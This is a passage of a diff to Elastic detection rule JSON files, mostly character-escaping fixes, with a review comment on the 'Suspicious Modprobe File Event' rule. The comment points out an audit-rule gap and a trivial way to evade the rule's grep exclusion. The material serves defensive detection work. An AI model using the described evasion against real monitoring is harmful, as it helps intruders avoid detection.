However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action in (\"opened-file\", \"read-file\", \"wrote-to-file\") and\nfile.path : (\"/etc/modprobe.conf\", \"/etc/modprobe.d\", \"/etc/modprobe.d/*\") and not \n(process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\") or process.title : (\"*grep*\") or process.parent.pid == 1)\n", "required_fields": [ { 
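Review bot: The new-side `note` tells operators to add `-w /etc/modprobe.conf -p wa -k modprobe` and `-w /etc/modprobe.d -p wa -k modprobe`, but an auditd watch only reports the access types listed in `-p`, so `wa` never yields the read-only opens that the rule's `query` (the context line right after) matches through `"opened-file"` and `"read-file"` — which is exactly the Discovery case this rule is tagged with. The audit rules should read `-p rwa` (with a sentence in the note warning about the extra read volume on `/etc/modprobe.d`), to be fixed in the next rule revision since `_1.json` is a frozen version; the same text is duplicated in the `setup` field and in the `_103`/`_104` revisions further down this diff. Separately, the query's `process.title : ("*grep*")` exclusion fires on any process whose title merely contains `grep` anywhere in its arguments, which the attacker controls, so it is a trivial evasion; excluding on `process.name` for the actual grep binaries would be narrower.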
@@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json index 5ea959dc756..c514a4733c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_103.json 
@@ -20,7 +20,7 @@ "process.executable", "file.path" ], - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\" or \"/etc/modprobe.d\" or /etc/modprobe.d/*)\n", "required_fields": [ { 
@@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json index 2ba8d17a13d..73e3f5a8fee 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_104.json 
@@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json index 551c51843b9..87b144faa02 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_2.json 
@@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Modprobe File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\", \"/etc/modprobe.d\", \"/etc/modprobe.d/*\") and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"dpkg\", \"cp\") or \n process.title : \"*grep*\" or process.parent.pid == 1\n)\n", "required_fields": [ { 
@@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json index 92effad61ed..ea49fdefb68 100644 --- a/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/40ddbcc8-6561-44d9-afc8-eefdbfe0cccd_3.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Modprobe File Event", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and\nfile.path : (\"/etc/modprobe.conf\", \"/etc/modprobe.d\", \"/etc/modprobe.d/*\") and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"dpkg\", \"cp\", \"mkinitramfs\",\n \"readlink\") or process.title : \"*grep*\" or process.parent.pid == 1\n)\n", "required_fields": [ { 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "40ddbcc8-6561-44d9-afc8-eefdbfe0cccd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /etc/modprobe.conf -p wa -k modprobe\n-w /etc/modprobe.d -p wa -k modprobe\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json index a44724b7780..9f61b3a5755 100644 --- a/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/41284ba3-ed1a-4598-bfba-a97f75d9aba2_1.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json
index 66a3874074b..ef636e5417d 100644
--- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "416697ae-e468-4093-a93d-59661fa619ec",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json
index 04b4e4e4675..71b42fe6cc6 100644
--- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "416697ae-e468-4093-a93d-59661fa619ec",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json
index c06608ffc19..ab8496c8896 100644
--- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_106.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "416697ae-e468-4093-a93d-59661fa619ec",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json
index 962c972b2ab..d2a795d1289 100644
--- a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_107.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "416697ae-e468-4093-a93d-59661fa619ec",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json b/packages/security_detection_engine/kibana/security_rule/416697ae-e468-4093-a93d-59661fa619ec_108.json
index daf79c2b372..675b59b2890 100644
